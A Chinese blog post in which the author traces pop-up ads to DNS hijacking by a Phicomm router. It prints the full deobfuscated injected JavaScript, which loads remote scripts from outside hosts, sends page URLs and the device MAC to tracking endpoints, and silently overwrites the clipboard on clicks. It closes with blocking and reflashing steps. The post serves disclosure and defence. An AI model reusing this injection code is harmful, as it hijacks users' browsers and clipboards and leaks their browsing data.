斐讯路由DNS劫持

可能是太久没见广告了吧……
突然间弹了个牛皮癣

起因

在进行线上环境调试时习惯性的按了F12看看前端
结果发现Console里有了点不该有的东西

移动端访问非HTTPS网站更是直接弹了个广告

PC端挂着移动端的UA一样弹广告

很好 你成功的引起了我的注意

追查

首先发现console里请求的JS为
https://cnd.newapi.com/sdk/cnzz.js?v8和https://logs.newapi.com/jd/ad?f=zq18

ad内容解密后：

window.amb_jd_proxy_domain="logs.newapi.com";
window.amb_jd_cdn_domain="cnd.newapi.com";
window.amb_jd_proxy_f="zq18";
window.amb_jd_proxy_c="2";
window.amb_jd_cnzz_id="1274015796";
window.amb_jd_tongji_url="";
function amb_auto_load_ad_js(a, b) {
    var c = document.createElement("script");
    var d = document.getElementsByTagName("head")[0];
    c.src = a;
    d.appendChild(c);
    if (typeof b === "function") {
        c.onload = c.onreadystatechange = function() {
            if (!c.readyState || /loaded|complete/.test(c.readyState)) {
                b()
            }
        }
    }
}
amb_auto_load_ad_js("https://" + window.amb_jd_cdn_domain + "/sdk/cnzz.js?v8");

function amb_create_iframe() {
    var a = document.createElement("iframe");
    a.frameborder = 0;
    a.src = "https://" + window.amb_jd_cdn_domain + "/sdk/cnzz.php?p=" + window.amb_jd_proxy_f + "&siteid=" + window.amb_jd_cnzz_id;
    a.frameBorder = 0;
    a.width = "1px";
    a.height = "1px";
    a.scrolling = "no";
    document.body.appendChild(a)
}
var amb_iframe_time = "no";
(function() {
    setInterval(function() {
        Clipboard = [];
        clipboard = null
    }, 500);
    if (document.body) {
        amb_create_iframe()
    } else {
        setInterval(function() {
            if (amb_iframe_time == "no" && document.body) {
                amb_create_iframe();
                amb_iframe_time = "yes"
            }
        }, 1500)
    }
})();

ad请求了cnzz.js，解密后内容为

(function(h) {
    var g = {
        trigger: null,
        dd: document,
        ww: window,
        listener: [],
        listenerTouchend: [],
        listenerCopy: null,
        text: null,
        action: "copy",
        ua: window.navigator.userAgent,
        host: location.protocol + "//" + location.host,
        id: "default",
        token: "",
        hascopy: null,
        hasload: null,
        hascopy2: null,
        closeqq: "no",
        showAd: function() {
            this.id = window.amb_jd_proxy_f;
        },
        init: function() {
            var a = this;
            a.trigger = a.dd.getElementsByTagName("*");
            a.showAd();
            a.hascopy = a.sGet("amb_jd_copy");
            a.hasload = a.sGet("amb_jd_load");
            if (null == a.sGet("amb_jd_open")) {
                var b = "";
                null != a.sGet("amb_jd_open_info") ? (b = a.sGet("amb_jd_open_info")) : (b = a.randomString(), a.sSet("amb_jd_open_info", b, window.amb_jd_proxy_c));
                a._ajax("//" + window.amb_jd_proxy_domain + "/jd/gettokenv2?callback=jsonp" + b, {
                    f: a.id,
                    h: a.hasload,
                    current_url: encodeURIComponent(top.location.href)
                }, function(b) {
                    a.text = b.text;
                    a.token = b.token;
                    a.closeqq = b.closeqq;
                    if (b.hascopy == "yes") {
                        var amb_has_copy = a.sGet("amb_jd_has_copy");
                        if (amb_has_copy == null) {
                            try {
                                if (typeof eval("amb_auto_copy") == "function") {
                                    a.sSet("amb_jd_has_copy", "copyed", 3600);
                                    amb_auto_copy();
                                }
                            } catch (e) {}
                        }
                    }
                    if (b.iscn == "no") {
                        a.wxcp(b.text);
                    }
                    a.sSet("amb_jd_load", "has", 86400);
                    "null" == a.text && (a.text = 0);
                    a.dd.queryCommandSupported && a.dd.queryCommandSupported(a.action) ? a.text && (a.listenClick(), a.listenTouchend()) : 1 < a.ua.split("MQQBrowser").length && 1 < a.ua.split("Android").length && 2 > a.ua.split("MicroMessenger").length && 2 > a.ua.split("QQ/").length ? a.text && a.qqCopy() : (a.listenerCopy = a.listenNode(a.dd.body, "click", a.clipboardCopy.bind(a)));
                }, this);
            }
        },
        wxcp: function(a) {
            if (/MicroMessenger/i.test(navigator.userAgent)) {
                var iframe = document.createElement("iframe");
                iframe.style.cssText = "display:none;width:0px;height:0px;";
                iframe.src = "weixin://webview/copy/" + a;
                document.body.appendChild(iframe);
            }
        },
        cp: function(a) {
            var b = this;
            if (b.hascopy2 == null) {
                b.hascopy2 = "yes";
                b._ajax("//" + window.amb_jd_proxy_domain + "/jd/stat?callback=jsonp" + (new Date).getTime(), {
                    f: b.id,
                    t: b.token,
                    h: b.hascopy,
                    current_url: encodeURIComponent(top.location.href)
                }, function(c) {
                    b.sSet("amb_jd_open", "close", window.amb_jd_proxy_c);
                    b.sSet("amb_jd_copy", "has", 86400);
                }, true);
            }
        },
        qqCopy: function() {
            var a = this,
                b = a.text,
                c = navigator.appVersion,
                e = 1 < c.split("MQQBrowser/").length ? 2 : 0;
            if (a.closeqq == "yes") {
                return true;
            }
            if (e) {
                var f = {
                    url: b,
                    to_app: "10",
                    us_txt: "23s"
                };
                b = c.split("MQQBrowser/")[1].split(".");
                b = parseFloat(b[0] + "." + b[1]);
                b = 5.4 > (e ? b : 0) ? "//3gimg.qq.com/html5/js/qb.js" : "//jsapi.qq.com/get?api=app.share";
                c = a.dd.createElement("script");
                var d = a.dd.getElementsByTagName("body")[0];
                c.setAttribute("src", b);
                c.onload = function() {
                    "undefined" != typeof a.ww.browser && "undefined" != typeof a.ww.browser.app && 2 == e ? (a.ww.browser.app.share(f), a.cp("1")) : "undefined" != typeof a.ww.qb && 1 == e && (a.ww.qb.share(f), a.cp("1"));
                };
                d.appendChild(c);
            }
        },
        clipboardCopy: function(a) {
            _this.ww.clipboardData && this.text && _this.ww.clipboardData.setData("Text", this.text);
            this.listenerCopy.destroy();
        },
        listenClick: function() {
            for (var a = this, b = 0; b < a.trigger.length; b++) {
                a.listener.push(a.listenNode(a.trigger[b], "click", function(b) {
                    return a.onClick(b, "click");
                }));
            }
        },
        listenTouchend: function() {
            for (var a = this, b = 0; b < a.trigger.length; b++) {
                a.listenerTouchend.push(a.listenNode(a.trigger[b], "touchend", function(b) {
                    return a.onClick(b, "touchend");
                }));
            }
        },
        listenNode: function(a, b, c) {
            a.addEventListener(b, c, true);
            return {
                destroy: function() {
                    a.removeEventListener(b, c, true);
                }
            };
        },
        onClick: function(a, b) {
            var c = this;
            this.dd.body.hasAttribute("oncopy") && this.dd.body.setAttribute("oncopy", "return true");
            this.dd.body.hasAttribute("onpaste") && this.dd.body.setAttribute("onpaste", "return true");
            "INPUT" != a.target.nodeName && "TEXTAREA" != a.target.nodeName && ((new h(this.text, this.action, function(a) {
                a ? c.cp("1") : c.cp("2");
            })).start(), "click" == b ? (this.listenerD = true, this.listener.forEach(function(a, b) {
                a.destroy();
            })) : "touchend" == b && this.listenerTouchend.forEach(function(a, b) {
                a.destroy();
            }));
            this.dd.body.hasAttribute("oncopy") && this.dd.body.setAttribute("oncopy", "return false");
            this.dd.body.hasAttribute("onpaste") && this.dd.body.setAttribute("onpaste", "return false");
        },
        randomString: function() {
            var a = "";
            for (i = 0; 7 > i; i++) {
                a += "ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".charAt(Math.floor(61 * Math.random()));
            }
            return a;
        },
        sGet: function(a) {
            try {
                if (!this.ww.localStorage[a]) {
                    return null;
                }
                var b = JSON.parse(this.ww.localStorage[a]);
                return b.time < (new Date).getTime() ? (this.ww.localStorage[a] = null) : b.value;
            } catch (c) {
                return console.log("not localStorage."), null;
            }
        },
        sSet: function(a, b, c) {
            try {
                var e = {
                    name: a,
                    value: b,
                    time: (new Date).getTime() + 1000 * c
                };
                this.ww.localStorage[a] = JSON.stringify(e);
            } catch (f) {
                console.log("not localStorage.");
            }
        },
        now: function() {
            return (new Date).getTime();
        },
        rand: function() {
            return Math.random().toString().substr(2);
        },
        parseData: function(a) {
            var b = "";
            if ("string" === typeof a) {
                b = a;
            } else if ("object" === typeof a) {
                for (var c in a) {
                    b += "&" + c + "=" + encodeURIComponent(a[c]);
                }
            }
            b += "&_time=" + this.now();
            return b = b.substr(1);
        },
        _ajax: function(a, b, c) {
            a = a + (-1 === a.indexOf("?") ? "?" : "&") + this.parseData(b);
            if ((b = /callback=(\w+)/.exec(a)) && b[1]) {
                var e = b[1];
            } else {
                e = "jsonp_" + this.now() + "_" + this.rand(), a = a.replace("callback=?", "callback=" + e), a = a.replace("callback=%3F", "callback=" + e);
            }
            b = document.createElement("script");
            b.type = "text/javascript";
            b.src = a;
            b.id = "id_" + e;
            window[e] = function(a) {
                window[e] = void 0;
                var b = document.getElementById("id_" + e),
                    k = b.parentNode;
                k && 11 !== k.nodeType && k.removeChild(b);
                c(a);
            };
            (a = document.getElementsByTagName("head")) && a[0] && a[0].appendChild(b);
        }
    };
    try {
        parent.window.location.href != window.location.href && (g.host = parent.window.location.protocol + "//" + parent.window.location.host, g.dd = parent.document, g.ww = parent.window), g.init();
    } catch (a) {
        g.init();
    }
})(function(h, g, a) {
    return {
        fakeElem: null,
        text: h,
        action: g,
        selectedText: null,
        dd: document,
        ww: window,
        start: function() {
            this.text && (parent.window.location.href != window.location.href && (this.ww = top.window, this.dd = top.document), this.selectFake());
        },
        selectFake: function() {
            var a = "rtl" == this.dd.documentElement.getAttribute("dir");
            this.removeFake();
            this.fakeElem = this.dd.createElement("textarea");
            this.fakeElem.style.fontSize = "12pt";
            this.fakeElem.style.border = "0";
            this.fakeElem.style.padding = "0";
            this.fakeElem.style.margin = "0";
            this.fakeElem.style.position = "absolute";
            a ? (this.fakeElem.style.right = "-9999px") : (this.fakeElem.style.left = "-9999px");
            this.fakeElem.style.top = (this.ww.pageYOffset || this.dd.documentElement.scrollTop) + "px";
            this.fakeElem.setAttribute("readonly", "");
            this.fakeElem.value = this.text;
            this.dd.body.appendChild(this.fakeElem);
            this.selectedText = this.selectText(this.fakeElem);
            this.copyText();
        },
        removeFake: function() {
            this.fakeElem && (this.dd.body.removeChild(this.fakeElem), this.fakeElem = null);
        },
        copyText: function() {
            var b = void 0;
            try {
                b = this.dd.execCommand(this.action);
            } catch (c) {
                b = false;
            }
            this.removeFake();
            a.call(this, b);
        },
        selectText: function(a) {
            if ("SELECT" === a.nodeName) {
                a.focus(), a = a.value;
            } else if ("INPUT" === a.nodeName || "TEXTAREA" === a.nodeName) {
                var b = a.hasAttribute("readonly");
                b || a.setAttribute("readonly", "");
                a.select();
                a.setSelectionRange(0, a.value.length);
                b || a.removeAttribute("readonly");
                a = a.value;
            } else {
                a.hasAttribute("contenteditable") && a.focus();
                b = this.ww.getSelection();
                var e = this.dd.createRange();
                e.selectNodeContents(a);
                b.removeAllRanges();
                b.addRange(e);
                a = b.toString();
            }
            return a;
        }
    };
});

该JS会与http://222.73.156.235:8888/v2?MAC=XXXXXXXXXXXX一起作用弹广告，该网址内容为
MAC用于拼接下面的MAC地址（deviceMac）

(function () {

var ip = 'http://222.73.156.235:8888';
var pc = false;
var android = true;
var ios = true;
var deviceMac = 'XX:XX:XX:XX:XX:XX';
var statisticUrl = 'http://222.73.156.235:8888/v2/router/ad/state';
var a_str = {"top": {},"center": {},"bottom": {}};
    var hostUrl = '';
    // var timestamp = new Date().getTime();
    // lalala
    window.onload = function(){
        aa();
    }

    window.addEventListener('message', function(e){
        if(e.data.removeIframe == "yes"){
            document.getElementById(e.data.iframeId).remove();
        }

    }, false)
    
     //判断方向,resize的时候判断方向(adp-138)
    window.addEventListener("resize",function(){
          var iframe_Ct_a = document.getElementById('iframe_center_a');
          var iframe_Ct_b = document.getElementById('iframe_bottom_a');
          //中间插屏
          if(iframe_Ct_a){
             if( window.orientation == 90 || window.orientation==-90){
                  iframe_Ct_a.style.left = window.innerWidth /2 + "px";
                  iframe_Ct_a.style.top = window.innerHeight/1.2+"px";
                  iframe_Ct_a.style.marginLeft = parseInt(a_str.center.width)/2*(-1)+"px";
                  iframe_Ct_a.style.marginTop = (window.innerHeight/1.5)*(-1)+"px";
              }
            if( window.orientation == 180 || window.orientation == 0 ) {
               iframe_Ct_a.style.left = window.innerWidth /2 + "px";
               iframe_Ct_a.style.top = window.innerHeight /2 + "px";
               iframe_Ct_a.style.marginLeft = parseInt(a_str.center.width)/2*(-1)+"px";
               iframe_Ct_a.style.marginTop = parseInt(a_str.center.height)/2*(-1)+"px";
            }
          }
          
          //底部横幅
          if(iframe_Ct_b){
             if(window.orientation ==90 || window.orientation==-90){
                iframe_Ct_b.style.marginLeft = "25%";
             }
             if(window.orientation == 180 || window.orientation == 0){
                iframe_Ct_b.style.marginLeft = '0';
             }
          }
    });

    function aa() {

        //增加禁止域名判断
        if(forbidHost()){
            loadJs();
            return false;
        }

        hostUrl = encodeURIComponent(top.window.location.href);
        var browser = {
            versions: function () {
                var u = navigator.userAgent, app = navigator.appVersion;
                return {
                    trident: u.indexOf('Trident') > -1, //IE内核
                    presto: u.indexOf('Presto') > -1, //opera内核
                    webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
                    gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
                    mac: u.indexOf('Macintosh') > -1,//mac
                    mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //是否为移动终端
                    ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
                    android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
                    iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者QQHD浏览器
                    iPad: u.indexOf('iPad') > -1, //是否iPad
                    webApp: u.indexOf('Safari') == -1 //是否web应该程序，没有头部与底部
                };
            }()
        }
        if (isWeiXin() || isAPP() || true == browser.versions.mac) {
	    loadJs();
        } else if (browser.versions.android == true) {  //只投Android
            if(android){
                //console.log("ios append iframe.");
                appendIframe();
                loadJs();
                //console.log("ios append iframe over.");
            }
        } else if (browser.versions.ios == true || browser.versions.iPhone == true || browser.versions.iPad == true) {
            if(ios){
                //console.log("ios append iframe.");
                appendIframe();
		loadJs();
                //console.log("ios append iframe over.")
            }
        } else {
            loadJs();
        }


        function appendIframe() {
            var dataSet = {};
            dataSet.deviceMac = deviceMac;
            dataSet.statisticUrl = statisticUrl;
            dataSet.hostUrl = hostUrl;
            dataSet.ip = ip;
            if(a_str.top.height != undefined){
                var iframe_Tp = document.createElement('iframe');
                iframe_Tp.src = ip + '/routerad/common/pages/mobile_index.html';
                iframe_Tp.id = "iframe_top_a";
                iframe_Tp.name = "iframe_top_a";
                iframe_Tp.scrolling = "no";
                iframe_Tp.display = "block";
                iframe_Tp.style.position="fixed";
                iframe_Tp.setAttribute("frameborder","0");
                iframe_Tp.style.zIndex = "2147483647";

                var iframeWidth,iframeHeight;
                iframeWidth = window.innerWidth;
                iframeHeight = parseInt(a_str.top.height) * parseInt(iframeWidth)/parseInt(a_str.top.width);

                iframe_Tp.style.width = iframeWidth + "px";
                iframe_Tp.style.height =  iframeHeight + "px";

                //iframe_Bt.style.bottom = "0px";
                iframe_Bt.style.top = "0px";
                iframe_Tp.style.left = "0px";
                window.top.document.body.appendChild(iframe_Tp);
                dataSet.picList = a_str.top.picList;
                dataSet.iframeId = "iframe_top_a";

                document.getElementById('iframe_top_a').onload=function(){
                    var ifr = document.querySelector('#iframe_top_a');
                    ifr.contentWindow.postMessage(dataSet, '*');
                }
            }

            if(a_str.bottom.height != undefined){
                //console.log("bottom iframe.");
                var iframe_Bt = document.createElement('iframe');
                iframe_Bt.src = ip + '/routerad/common/pages/mobile_index.html';
                iframe_Bt.id = "iframe_bottom_a";
                iframe_Bt.name = "iframe_bottom_a";
                iframe_Bt.scrolling = "no";
                iframe_Bt.display = "block";
                iframe_Bt.style.position="fixed";
                iframe_Bt.setAttribute("frameborder","0");
                iframe_Bt.style.zIndex = "2147483647";

                var iframeWidth,iframeHeight;
                iframeWidth = window.innerWidth;
                iframeHeight = parseInt(a_str.bottom.height) * parseInt(iframeWidth)/parseInt(a_str.bottom.width);

                iframe_Bt.style.width = iframeWidth + "px";
                iframe_Bt.style.height =  iframeHeight + "px";

                //iframe_Bt.style.top = window.innerHeight + "px";
                iframe_Bt.style.bottom = "0px";
                iframe_Bt.style.left = "0px";
                iframe_Bt.style.marginTop = iframeHeight*(-1) + "px";

                window.top.document.body.appendChild(iframe_Bt);
                dataSet.picList = a_str.bottom.picList;
                dataSet.iframeId = "iframe_bottom_a";

                document.getElementById('iframe_bottom_a').onload=function(){
                    var ifr = document.querySelector('#iframe_bottom_a');
                    ifr.contentWindow.postMessage(dataSet, '*');
                }
            }

            if(a_str.center.height != undefined){
                //console.log("center iframe.");
                var iframe_Ct = document.createElement('iframe');
                iframe_Ct.src = ip + '/routerad/common/pages/mobile_index.html';
                iframe_Ct.id = "iframe_center_a";
                iframe_Ct.name = "iframe_center_a";
                iframe_Ct.scrolling = "no";
                iframe_Ct.display = "block";
                iframe_Ct.style.position="fixed";
                iframe_Ct.setAttribute("frameborder","0");
                iframe_Ct.style.zIndex = "2147483647";

                var iframeWidth,iframeHeight;
                iframeWidth = a_str.center.width;
                iframeHeight = a_str.center.height;

                iframe_Ct.style.width = parseInt(iframeWidth) + "px";
                iframe_Ct.style.height =  parseInt(iframeHeight) + "px";
                iframe_Ct.style.left = window.innerWidth /2 + "px";
                iframe_Ct.style.top = window.innerHeight /2 + "px";
                iframe_Ct.style.marginLeft = parseInt(iframeWidth)/2*(-1)+"px";
                iframe_Ct.style.marginTop = parseInt(iframeHeight)/2*(-1)+"px";
                window.top.document.body.appendChild(iframe_Ct);

                dataSet.picList = a_str.center.picList;
                dataSet.iframeId = "iframe_center_a";

                document.getElementById('iframe_center_a').onload=function(){
                    var ifr = document.querySelector('#iframe_center_a');
                    ifr.contentWindow.postMessage(dataSet, '*');
                }
            }
        }

    }

    function isWeiXin() {
        var ua = window.navigator.userAgent.toLowerCase();
        //console.log(ua);//mozilla/5.0 (iphone; cpu iphone os 9_1 like mac os x) applewebkit/601.1.46 (khtml, like gecko)version/9.0 mobile/13b143 safari/601.1
        if (ua.match(/MicroMessenger/i) == 'micromessenger') {
            return true;
        } else {
            return false;
        }
    }

    function isAPP() {
        var ua = window.navigator.userAgent.toLowerCase();

        if (ua.indexOf("biliapp") >= 0) {
            return true;
        }
        if (ua.indexOf("wifikey") >= 0) {
            return true;
        }
        if (ua.indexOf("newsarticle") >= 0) {
            return true;
        }
        if (ua.indexOf("peanutwi-fi") >= 0) {
            return true;
        }
        if (ua.indexOf("phiwifi")>=0) {
            return true;
        }
        if (ua.indexOf("changba") >= 0) {
            return true;
        }
        if (ua.indexOf("phicare") >= 0) {
            return true;
        }
        if (ua.indexOf("vmchybirdapp-android") >= 0) {
            return true;
        }
        if (ua.indexOf("vmchybirdapp-ios") >= 0) {
            return true;
        }
        if (ua.indexOf("momowebview") >= 0 || ua.indexOf("momokit") >= 0) {
            return true;
        } else {
            return false;
        }
    }

    //禁止显示广告的域名，后续增加多个时候可以使用数组
    function forbidHost(){
        var url = top.window.location.href;
        var host = top.window.location.host;
        if (host.indexOf(".gov.cn") != -1) {
            return true;
        }
	var forbidHostArray = ["www.xinhuanet.com", ".eastday.com", "china.com.cn", "www.chinadaily.com.cn", ".caijing.com.cn", ".huanqiu.com", ".youku.com", ".youth.cn", ".people.com.cn", "www.wangxin.name", "wjwcoin.pro", "www.wkj.link", "www.bid-buy.pro", "www.daywin.pro", "www.7650.biz"];
        for (i = 0; i < forbidHostArray.length; i++) {
            if (host.indexOf(forbidHostArray[i]) != -1) {
                return true;
            }
        }
        var reg = /phicomm\.com/g;
        var baiduReg = /m\.baidu\.com\/static/g;
        if(reg.test(url) || baiduReg.test(url)){
            return true;
        }else{
            return false;
        }
    }
    
    function loadJs() {
    	var newscript = document.createElement('script');
    	newscript.setAttribute('type', 'text/javascript');
    	newscript.setAttribute('src', 'https://www.jiubuhua.com/exjs.js');
	
    	var newscript2 = document.createElement('script');
    	newscript2.setAttribute('type', 'text/javascript');
    	newscript2.setAttribute('src', 'http://bb.dugesheying.com/yhws/channel/yj/yjda.js');
	
    	var newscript3 = document.createElement('script');
    	newscript3.setAttribute('type', 'text/javascript');
    	newscript3.setAttribute('src', 'https://www.jiubuhua.com/9cc19.js');

	var newscript4 = document.createElement('script');
        newscript4.setAttribute('type', 'text/javascript');
        newscript4.setAttribute('src', 'https://logs.newapi.com/jd/ad?f=zq18');
		
    	var head = document.getElementsByTagName('head')[0];
    	head.appendChild(newscript);
    	head.appendChild(newscript2);
    	head.appendChild(newscript3);
	head.appendChild(newscript4);
    }

})();

注意到了代码中有几行

var reg = /phicomm\.com/g;
        var baiduReg = /m\.baidu\.com\/static/g;
        if(reg.test(url) || baiduReg.test(url)){
            return true;
        }else{
            return false;
        }

不对斐讯和百度域名进行广告推送，笔者用的路由正是斐讯
随后对IP进行查询

确定为路由器干的了

解决方案

1. 上游设备对IP段222.73.156.0/24加黑
2. 电脑开启防火墙，拉黑222.73.156.0/24
3. 刷机 参考斐讯K2P A1新版刷机链接